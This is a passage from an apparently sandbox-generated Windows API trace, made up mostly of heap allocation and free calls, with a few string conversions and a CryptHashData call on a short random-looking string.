lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0168.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8dedd0 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.811] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0168.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x9bda68 [0168.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bda68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0168.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.816] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0168.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0168.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.817] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree 